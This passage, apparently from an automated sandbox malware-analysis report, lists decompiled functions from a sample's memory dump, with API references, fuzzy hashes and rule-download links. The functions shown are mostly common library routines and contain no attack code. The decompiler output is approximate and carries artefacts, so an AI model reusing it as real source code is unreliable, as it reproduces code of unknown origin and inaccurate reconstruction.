                                                                                                                            0x0042be9c
                                                                                                                            0x0042be9c
                                                                                                                            0x0042bea1
                                                                                                                            0x0042bea3
                                                                                                                            0x0042bea3
                                                                                                                            0x00000000
                                                                                                                            0x0042bea1
                                                                                                                            0x0042be9a

                                                                                                                            APIs
                                                                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0042BEB2
                                                                                                                            • __isleadbyte_l.LIBCMT ref: 0042BEE6
                                                                                                                            • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,A045FF98,?,00000000,00000800,?,00000800,0042B288,?,?,00000002), ref: 0042BF17
                                                                                                                            • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,00000800,?,00000800,0042B288,?,?,00000002), ref: 0042BF85
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3058430110-0
                                                                                                                            • Opcode ID: 4745e3ff9433fb9a363c4a6dcf797c297991f94bc400b748f239bdf6b0c4a63a
                                                                                                                            • Instruction ID: 9c6d02d983552469935d65a5d3931e79538ed56ca2fae16adf526e613b57be71
                                                                                                                            • Opcode Fuzzy Hash: 4745e3ff9433fb9a363c4a6dcf797c297991f94bc400b748f239bdf6b0c4a63a
                                                                                                                            • Instruction Fuzzy Hash: 0731C031B00265EFDB20DF64EC809AE7BB4FF01311F5685AAE6658B291D334DD40DB99
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0041CE67 Relevance: 6.1, APIs: 4, Instructions: 85windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 76%
                                                                                                                            			E0041CE67(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				int _t34;
				intOrPtr* _t62;
				void* _t63;
				void* _t64;

				_t64 = __eflags;
				_push(0x24);
				E0041E981(E0043218D, __ebx, __edi, __esi);
				_t62 =  *((intOrPtr*)(_t63 + 8)) + 0xffffffc0;
				E004070B9(_t63 - 0x14, _t64,  *((intOrPtr*)( *((intOrPtr*)(_t63 + 8)) - 0x24)));
				 *(_t63 - 4) = 0;
				if( *((intOrPtr*)(_t63 + 0x10)) <=  *((intOrPtr*)(_t62 + 0x3c))) {
					L8:
					__eflags =  *(_t62 + 0x30);
					if( *(_t62 + 0x30) == 0) {
						_t34 = PeekMessageA(_t63 - 0x30, 0, 0, 0, 2);
						__eflags = _t34;
						if(_t34 != 0) {
							 *((intOrPtr*)( *_t62 + 0x58))(_t63 - 0x30);
						}
						L14:
						 *(_t63 - 4) =  *(_t63 - 4) | 0xffffffff;
						if( *(_t63 - 0x10) != 0) {
							_push( *((intOrPtr*)(_t63 - 0x14)));
							_push(0);
							E00406890();
						}
						L17:
						return E0041EA59(1);
					}
					L9:
					 *(_t63 - 4) =  *(_t63 - 4) | 0xffffffff;
					__eflags =  *(_t63 - 0x10);
					if( *(_t63 - 0x10) != 0) {
						_push( *((intOrPtr*)(_t63 - 0x14)));
						_push(0);
						E00406890();
					}
					_push(2);
					_pop(1);
					goto L17;
				}
				if( *(_t62 + 0x30) != 0) {
					goto L9;
				}
				_push(_t63 - 0x30);
				if( *((intOrPtr*)( *_t62 + 0x5c))() == 0 ||  *((intOrPtr*)(_t62 + 0x2c)) == 0) {
					goto L8;
				} else {
					 *(_t62 + 0x30) = 1;
					do {
					} while (PeekMessageA(_t63 - 0x30, 0, 0x200, 0x209, 3) != 0);
					do {
					} while (PeekMessageA(_t63 - 0x30, 0, 0x100, 0x109, 3) != 0);
					 *((intOrPtr*)( *_t62 + 0x64))( *((intOrPtr*)(_t63 + 0xc)));
					 *(_t62 + 0x30) = 0;
					goto L14;
				}
			}







                                                                                                                            0x0041ce67
                                                                                                                            0x0041ce67
                                                                                                                            0x0041ce6e
                                                                                                                            0x0041ce79
                                                                                                                            0x0041ce7f
                                                                                                                            0x0041ce8c
                                                                                                                            0x0041ce8f
                                                                                                                            0x0041cef4
                                                                                                                            0x0041cef4
                                                                                                                            0x0041cef7
                                                                                                                            0x0041cf19
                                                                                                                            0x0041cf1f
                                                                                                                            0x0041cf21
                                                                                                                            0x0041cf2b
                                                                                                                            0x0041cf2b
                                                                                                                            0x0041cf2e
                                                                                                                            0x0041cf2e
                                                                                                                            0x0041cf35
                                                                                                                            0x0041cf37
                                                                                                                            0x0041cf3a
                                                                                                                            0x0041cf3b
                                                                                                                            0x0041cf3b
                                                                                                                            0x0041cf43
                                                                                                                            0x0041cf48
                                                                                                                            0x0041cf48
                                                                                                                            0x0041cef9
                                                                                                                            0x0041cef9
                                                                                                                            0x0041cefd
                                                                                                                            0x0041cf00
                                                                                                                            0x0041cf02
                                                                                                                            0x0041cf05
                                                                                                                            0x0041cf06
                                                                                                                            0x0041cf06
                                                                                                                            0x0041cf0b
                                                                                                                            0x0041cf0d
                                                                                                                            0x00000000
                                                                                                                            0x0041cf0d
                                                                                                                            0x0041ce94
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0041ce9b
                                                                                                                            0x0041cea3
                                                                                                                            0x00000000
                                                                                                                            0x0041ceaa
                                                                                                                            0x0041ceb0
                                                                                                                            0x0041ceb7
                                                                                                                            0x0041ceca
                                                                                                                            0x0041cece
                                                                                                                            0x0041cee1
                                                                                                                            0x0041ceec
                                                                                                                            0x0041ceef
                                                                                                                            0x00000000
                                                                                                                            0x0041ceef

                                                                                                                            APIs
                                                                                                                            • __EH_prolog3.LIBCMT ref: 0041CE6E
                                                                                                                            • PeekMessageA.USER32(00000001,00000000,00000200,00000209,00000003), ref: 0041CEC8
                                                                                                                            • PeekMessageA.USER32(00000001,00000000,00000100,00000109,00000003), ref: 0041CEDF
                                                                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000002), ref: 0041CF19
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessagePeek$H_prolog3
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3998274959-0
                                                                                                                            • Opcode ID: f1a133b8c3668100a250ce697cc53a50a954a600a41f2f69843c71b2dbd72ba2
                                                                                                                            • Instruction ID: 3b84e3a78d3c5cab79b6d1a3f9182df0504d913f29aaf35d4958017401298424
                                                                                                                            • Opcode Fuzzy Hash: f1a133b8c3668100a250ce697cc53a50a954a600a41f2f69843c71b2dbd72ba2
                                                                                                                            • Instruction Fuzzy Hash: E0317F71950309ABDF20EFA4DDC5EAE73A8BF04304F14092FB652A62C1D778AA41CA18
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040F72C Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 20%
                                                                                                                            			E0040F72C(intOrPtr __ebx, intOrPtr* __ecx, intOrPtr __esi, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				signed int _v8;
				signed char _v264;
				void* __edi;
				signed int _t11;
				signed int _t14;
				void* _t16;
				char _t19;
				signed int _t22;
				intOrPtr _t23;
				signed int* _t34;
				CHAR* _t36;
				signed int _t37;

				_t35 = __esi;
				_t26 = __ebx;
				_t11 =  *0x441590; // 0x4917eadc
				_v8 = _t11 ^ _t37;
				_t34 = _a8;
				_push(0x100);
				_t33 =  &_v264;
				_push( &_v264);
				_push(_a4);
				_t14 =  *((intOrPtr*)( *__ecx + 0x7c))();
				if(_t14 != 0) {
					_push(__ebx);
					_push(__esi);
					_t36 =  &_v264;
					_t16 = E004215A0(_v264 & 0x000000ff);
					while(_t16 != 0) {
						_t36 = CharNextA(_t36);
						_t16 = E004215A0( *_t36 & 0x000000ff);
					}
					_t19 =  *_t36;
					if(_t19 == 0x2b || _t19 == 0x2d) {
						_t36 = CharNextA(_t36);
					}
					_t22 = E004214D0( *_t36 & 0x000000ff);
					_pop(_t35);
					_pop(_t26);
					if(_t34 != 0) {
						 *_t34 = _t22;
					}
					if(_t22 == 0) {
						L3:
						_t23 = 0;
						goto L17;
					} else {
						_push(0xa);
						_push(0);
						_push( &_v264);
						if(_a12 == 0) {
							_t23 = E004213E1();
						} else {
							_t23 = E004213B8();
						}
						L17:
						return E0041D773(_t23, _t26, _v8 ^ _t37, _t33, _t34, _t35);
					}
				}
				if(_t34 != 0) {
					 *_t34 =  *_t34 & _t14;
				}
				goto L3;
			}















                                                                                                                            0x0040f72c
                                                                                                                            0x0040f72c
                                                                                                                            0x0040f735
                                                                                                                            0x0040f73c
                                                                                                                            0x0040f742
                                                                                                                            0x0040f745
                                                                                                                            0x0040f74a
                                                                                                                            0x0040f750
                                                                                                                            0x0040f751
                                                                                                                            0x0040f754
                                                                                                                            0x0040f759
                                                                                                                            0x0040f76c
                                                                                                                            0x0040f76d
                                                                                                                            0x0040f76f
                                                                                                                            0x0040f775
                                                                                                                            0x0040f790
                                                                                                                            0x0040f785
                                                                                                                            0x0040f78b
                                                                                                                            0x0040f78b
                                                                                                                            0x0040f795
                                                                                                                            0x0040f799
                                                                                                                            0x0040f7a2
                                                                                                                            0x0040f7a2
                                                                                                                            0x0040f7a8
                                                                                                                            0x0040f7b0
                                                                                                                            0x0040f7b1
                                                                                                                            0x0040f7b2
                                                                                                                            0x0040f7b4
                                                                                                                            0x0040f7b4
                                                                                                                            0x0040f7b8
                                                                                                                            0x0040f761
                                                                                                                            0x0040f761
                                                                                                                            0x00000000
                                                                                                                            0x0040f7ba
                                                                                                                            0x0040f7be
                                                                                                                            0x0040f7c6
                                                                                                                            0x0040f7c8
                                                                                                                            0x0040f7c9
                                                                                                                            0x0040f7d2
                                                                                                                            0x0040f7cb
                                                                                                                            0x0040f7cb
                                                                                                                            0x0040f7cb
                                                                                                                            0x0040f7da
                                                                                                                            0x0040f7e6
                                                                                                                            0x0040f7e6
                                                                                                                            0x0040f7b8
                                                                                                                            0x0040f75d
                                                                                                                            0x0040f75f
                                                                                                                            0x0040f75f
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • CharNextA.USER32(?), ref: 0040F783
                                                                                                                              • Part of subcall function 004215A0: __ismbcspace_l.LIBCMT ref: 004215A6
                                                                                                                            • CharNextA.USER32(00000000), ref: 0040F7A0
                                                                                                                            • _strtol.LIBCMT ref: 0040F7CB
                                                                                                                            • _strtoul.LIBCMT ref: 0040F7D2
                                                                                                                              • Part of subcall function 004213E1: strtoxl.LIBCMT ref: 00421401
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CharNext$__ismbcspace_l_strtol_strtoulstrtoxl
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4211061542-0
                                                                                                                            • Opcode ID: 8ab644e6b37b1f1d4b5203d7187f99bbf0e49bf43464103a6cbd96734d57608e
                                                                                                                            • Instruction ID: e868ee3c09e3569b7ffc5d1aed962b410aa35303588eab2ba323992c7da9e4c3
                                                                                                                            • Opcode Fuzzy Hash: 8ab644e6b37b1f1d4b5203d7187f99bbf0e49bf43464103a6cbd96734d57608e
                                                                                                                            • Instruction Fuzzy Hash: 3E2105716002146BCB30EB758C41BAA77E89F59354F90007BE980E7691EB78DA858B6A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00414672 Relevance: 6.1, APIs: 4, Instructions: 70COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 37%
                                                                                                                            			E00414672(signed int _a4, signed int _a8, intOrPtr _a12) {
				void* _t15;
				signed int _t17;
				void* _t18;
				void* _t19;
				signed int _t23;
				signed int* _t31;

				_t31 = _a8;
				if(_t31 == 0) {
					return _t15;
				}
				_t23 = _a4;
				if((_t23 & 0x00002000) == 0) {
					_t17 = (_t23 & 0x0000ffff) - 8;
					if(_t17 == 0) {
						__imp__#6( *_t31);
						L16:
						 *_t31 =  *_t31 & 0x00000000;
						L17:
						if((_t23 & 0x00001000) != 0 &&  !(_t23 & 0x00004000) != 0) {
							__imp__CoTaskMemFree(_t31[1]);
						}
						return _t17;
					}
					_t18 = _t17 - 1;
					if(_t18 == 0) {
						L13:
						_t17 =  *_t31;
						if(_t17 == 0) {
							goto L17;
						}
						_t17 =  *((intOrPtr*)( *_t17 + 8))(_t17);
						goto L16;
					}
					_t17 = _t18 - 3;
					if(_t17 == 0) {
						__imp__#9(_t31);
						goto L17;
					}
					_t19 = _t17 - 1;
					if(_t19 == 0) {
						goto L13;
					} else {
						_t17 = _t19 - 0x7b;
						if(_t17 == 0) {
							E0041460F( &_a8, _a12);
							_t17 = _a8;
							if(_t17 != 0) {
								 *((intOrPtr*)( *_t17 + 0x10))(_t17,  *_t31, 0);
								_t17 = _a8;
								if(_t17 != 0) {
									_t17 =  *((intOrPtr*)( *_t17 + 8))(_t17);
								}
							}
						}
						goto L17;
					}
				}
				_t17 =  *_t31;
				if(_t17 == 0) {
					goto L17;
				} else {
					__imp__#16(_t17);
					goto L16;
				}
			}









                                                                                                                            0x00414676
                                                                                                                            0x0041467b
                                                                                                                            0x0041471f
                                                                                                                            0x0041471f
                                                                                                                            0x00414682
                                                                                                                            0x0041468a
                                                                                                                            0x0041469e
                                                                                                                            0x004146a1
                                                                                                                            0x004146f7
                                                                                                                            0x004146fd
                                                                                                                            0x004146fd
                                                                                                                            0x00414700
                                                                                                                            0x00414705
                                                                                                                            0x00414716
                                                                                                                            0x00414716
                                                                                                                            0x00000000
                                                                                                                            0x0041471c
                                                                                                                            0x004146a3
                                                                                                                            0x004146a4
                                                                                                                            0x004146e7
                                                                                                                            0x004146e7
                                                                                                                            0x004146eb
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004146f0
                                                                                                                            0x00000000
                                                                                                                            0x004146f0
                                                                                                                            0x004146a6
                                                                                                                            0x004146a9
                                                                                                                            0x004146df
                                                                                                                            0x00000000
                                                                                                                            0x004146df
                                                                                                                            0x004146ab
                                                                                                                            0x004146ac
                                                                                                                            0x00000000
                                                                                                                            0x004146ae
                                                                                                                            0x004146ae
                                                                                                                            0x004146b1
                                                                                                                            0x004146b9
                                                                                                                            0x004146be
                                                                                                                            0x004146c3
                                                                                                                            0x004146cc
                                                                                                                            0x004146cf
                                                                                                                            0x004146d4
                                                                                                                            0x004146d9
                                                                                                                            0x004146d9
                                                                                                                            0x004146d4
                                                                                                                            0x004146c3
                                                                                                                            0x00000000
                                                                                                                            0x004146b1
                                                                                                                            0x004146ac
                                                                                                                            0x0041468c
                                                                                                                            0x00414690
                                                                                                                            0x00000000
                                                                                                                            0x00414692
                                                                                                                            0x00414693
                                                                                                                            0x00000000
                                                                                                                            0x00414693

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ArrayDestroyFreeSafeTask
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3253174383-0
                                                                                                                            • Opcode ID: 6d1ca49c01606a3669e69d80904935a64f35adaf8e3d9e0b7de776493cd8529f
                                                                                                                            • Instruction ID: 9a69766070d7d9693c725817203ccb7c197632e2ae97d8da828b00c6d7a57ef2
                                                                                                                            • Opcode Fuzzy Hash: 6d1ca49c01606a3669e69d80904935a64f35adaf8e3d9e0b7de776493cd8529f
                                                                                                                            • Instruction Fuzzy Hash: 7C1196702002469BDB259FA5EC88BE777A5FF83755B14001AF865D7290CB3DED81CA58
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040DAAF Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 87%
                                                                                                                            			E0040DAAF(void* __ebx, void* __edi, void* __esi, void* __eflags, void* _a4, intOrPtr _a8, char _a12) {
				intOrPtr* _v0;
				void* _v4;
				signed int _v8;
				intOrPtr _v16;
				void* _t20;
				intOrPtr* _t23;
				void* _t29;
				void* _t31;
				intOrPtr _t35;
				char _t36;
				void* _t40;
				void* _t42;
				void* _t44;

				_t44 = __eflags;
				_t31 = __ebx;
				_push(4);
				E0041E981(E0043110F, __ebx, __edi, __esi);
				_t35 = E00402521(_t44, 0xc);
				_v16 = _t35;
				_t20 = 0;
				_v4 = 0;
				if(_t35 != 0) {
					_t20 = E0040DA7D(_t35);
				}
				_t36 = _a4;
				_v8 = _v8 | 0xffffffff;
				 *((intOrPtr*)(_t20 + 8)) = _t36;
				_a4 = _t20;
				E00420866( &_a4, 0x43b940);
				asm("int3");
				_t40 = _t42;
				_t23 = _v0;
				_push(_t31);
				if(_t23 != 0) {
					 *_t23 = 0;
				}
				if(FormatMessageA(0x1100, 0,  *(_t36 + 8), 0x800,  &_a12, 0, 0) != 0) {
					E0040CDBE(_t40, _a4, _a8, _a12, 0xffffffff);
					LocalFree(_a12);
					_t29 = 1;
					__eflags = 1;
				} else {
					 *_a4 = 0;
					_t29 = 0;
				}
				return _t29;
			}
















                                                                                                                            0x0040daaf
                                                                                                                            0x0040daaf
                                                                                                                            0x0040daaf
                                                                                                                            0x0040dab6
                                                                                                                            0x0040dac3
                                                                                                                            0x0040dac5
                                                                                                                            0x0040dac8
                                                                                                                            0x0040dacc
                                                                                                                            0x0040dacf
                                                                                                                            0x0040dad1
                                                                                                                            0x0040dad1
                                                                                                                            0x0040dad6
                                                                                                                            0x0040dad9
                                                                                                                            0x0040dadd
                                                                                                                            0x0040dae0
                                                                                                                            0x0040daec
                                                                                                                            0x0040daf1
                                                                                                                            0x0040daf3
                                                                                                                            0x0040daf5
                                                                                                                            0x0040daf8
                                                                                                                            0x0040dafd
                                                                                                                            0x0040daff
                                                                                                                            0x0040daff
                                                                                                                            0x0040db1d
                                                                                                                            0x0040db33
                                                                                                                            0x0040db3e
                                                                                                                            0x0040db46
                                                                                                                            0x0040db46
                                                                                                                            0x0040db1f
                                                                                                                            0x0040db22
                                                                                                                            0x0040db24
                                                                                                                            0x0040db24
                                                                                                                            0x0040db49

                                                                                                                            APIs
                                                                                                                            • __EH_prolog3.LIBCMT ref: 0040DAB6
                                                                                                                              • Part of subcall function 00402521: _malloc.LIBCMT ref: 0040253B
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0040DAEC
                                                                                                                            • FormatMessageA.KERNEL32(00001100,00000000,?,00000800,00000008,00000000,00000000,00000000,?,?,0043B940,00000004,00401496,?,0040150B,80070057), ref: 0040DB15
                                                                                                                              • Part of subcall function 0040CDBE: _wctomb_s.LIBCMT ref: 0040CDCE
                                                                                                                            • LocalFree.KERNEL32(00000008), ref: 0040DB3E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow_malloc_wctomb_s
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1615547351-0
                                                                                                                            • Opcode ID: 4ca138873899e098f0899710f10d53dff684c091beed85ffa48816cb9be709e6
                                                                                                                            • Instruction ID: 3185fffa092a2a8d4e6c183b03923e540d751620809ddfade85658fac9434ed0
                                                                                                                            • Opcode Fuzzy Hash: 4ca138873899e098f0899710f10d53dff684c091beed85ffa48816cb9be709e6
                                                                                                                            • Instruction Fuzzy Hash: 3A11A371A04249AFDF01DFA4CC81EAE3BA8FF08354F10853AFA25DA2D1D7359A14CB58
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00403417 Relevance: 6.1, APIs: 4, Instructions: 56threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 95%
                                                                                                                            			E00403417(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t37;
				intOrPtr _t43;
				void* _t45;
				intOrPtr* _t51;
				void* _t52;
				void* _t53;

				_t53 = __eflags;
				_t46 = __ecx;
				_t44 = __ebx;
				_push(4);
				E0041E981(E004310C8, __ebx, __edi, __esi);
				_t51 = __ecx;
				 *((intOrPtr*)(_t52 - 0x10)) = __ecx;
				E00405B8D(__ebx, __ecx, __edi, __ecx, _t53);
				_t54 =  *((intOrPtr*)(_t52 + 8));
				 *((intOrPtr*)(_t52 - 4)) = 0;
				 *_t51 = 0x43385c;
				if( *((intOrPtr*)(_t52 + 8)) == 0) {
					 *((intOrPtr*)(_t51 + 0x50)) = 0;
				} else {
					_t43 = E0041ED91( *((intOrPtr*)(_t52 + 8)));
					_pop(_t46);
					 *((intOrPtr*)(_t51 + 0x50)) = _t43;
				}
				_t45 = E0040706D(_t44, 0, _t51, _t54);
				_t55 = _t45;
				if(_t45 == 0) {
					L4:
					E0040D8B0(_t46);
				}
				_t7 = _t45 + 0x74; // 0x74
				_t46 = _t7;
				_t37 = E00402F49(_t45, _t7, 0, _t51, _t55);
				if(_t37 == 0) {
					goto L4;
				}
				 *((intOrPtr*)(_t37 + 4)) = _t51;
				 *((intOrPtr*)(_t51 + 0x2c)) = GetCurrentThread();
				 *((intOrPtr*)(_t51 + 0x30)) = GetCurrentThreadId();
				 *((intOrPtr*)(_t45 + 4)) = _t51;
				 *((intOrPtr*)(_t51 + 0x44)) = 0;
				 *((intOrPtr*)(_t51 + 0x7c)) = 0;
				 *((intOrPtr*)(_t51 + 0x64)) = 0;
				 *((intOrPtr*)(_t51 + 0x68)) = 0;
				 *((intOrPtr*)(_t51 + 0x54)) = 0;
				 *((intOrPtr*)(_t51 + 0x60)) = 0;
				 *((intOrPtr*)(_t51 + 0x88)) = 0;
				 *((intOrPtr*)(_t51 + 0x58)) = 0;
				 *((short*)(_t51 + 0x92)) = 0;
				 *((short*)(_t51 + 0x90)) = 0;
				 *((intOrPtr*)(_t51 + 0x48)) = 0;
				 *((intOrPtr*)(_t51 + 0x8c)) = 0;
				 *((intOrPtr*)(_t51 + 0x80)) = 0;
				 *((intOrPtr*)(_t51 + 0x84)) = 0;
				 *((intOrPtr*)(_t51 + 0x70)) = 0;
				 *((intOrPtr*)(_t51 + 0x74)) = 0;
				 *((intOrPtr*)(_t51 + 0x94)) = 0;
				 *((intOrPtr*)(_t51 + 0x9c)) = 0;
				 *((intOrPtr*)(_t51 + 0x5c)) = 0;
				 *((intOrPtr*)(_t51 + 0x6c)) = 0;
				 *((intOrPtr*)(_t51 + 0x98)) = 0x200;
				return E0041EA59(_t51);
			}









                                                                                                                            0x00403417
                                                                                                                            0x00403417
                                                                                                                            0x00403417
                                                                                                                            0x00403417
                                                                                                                            0x0040341e
                                                                                                                            0x00403423
                                                                                                                            0x00403425
                                                                                                                            0x00403428
                                                                                                                            0x0040342f
                                                                                                                            0x00403432
                                                                                                                            0x00403435
                                                                                                                            0x0040343b
                                                                                                                            0x0040344b
                                                                                                                            0x0040343d
                                                                                                                            0x00403440
                                                                                                                            0x00403445
                                                                                                                            0x00403446
                                                                                                                            0x00403446
                                                                                                                            0x00403453
                                                                                                                            0x00403455
                                                                                                                            0x00403457
                                                                                                                            0x00403459
                                                                                                                            0x00403459
                                                                                                                            0x00403459
                                                                                                                            0x0040345e
                                                                                                                            0x0040345e
                                                                                                                            0x00403461
                                                                                                                            0x00403468
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040346a
                                                                                                                            0x00403473
                                                                                                                            0x0040347c
                                                                                                                            0x0040347f
                                                                                                                            0x00403482
                                                                                                                            0x00403485
                                                                                                                            0x00403488
                                                                                                                            0x0040348b
                                                                                                                            0x0040348e
                                                                                                                            0x00403491
                                                                                                                            0x00403494
                                                                                                                            0x0040349a
                                                                                                                            0x0040349d
                                                                                                                            0x004034a4
                                                                                                                            0x004034ab
                                                                                                                            0x004034ae
                                                                                                                            0x004034b4
                                                                                                                            0x004034ba
                                                                                                                            0x004034c0
                                                                                                                            0x004034c3
                                                                                                                            0x004034c6
                                                                                                                            0x004034cc
                                                                                                                            0x004034d2
                                                                                                                            0x004034d5
                                                                                                                            0x004034d8
                                                                                                                            0x004034e9

                                                                                                                            APIs
                                                                                                                            • __EH_prolog3.LIBCMT ref: 0040341E
                                                                                                                              • Part of subcall function 00405B8D: __EH_prolog3.LIBCMT ref: 00405B94
                                                                                                                            • __strdup.LIBCMT ref: 00403440
                                                                                                                            • GetCurrentThread.KERNEL32 ref: 0040346D
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00403476
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentH_prolog3Thread$__strdup
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4206445780-0
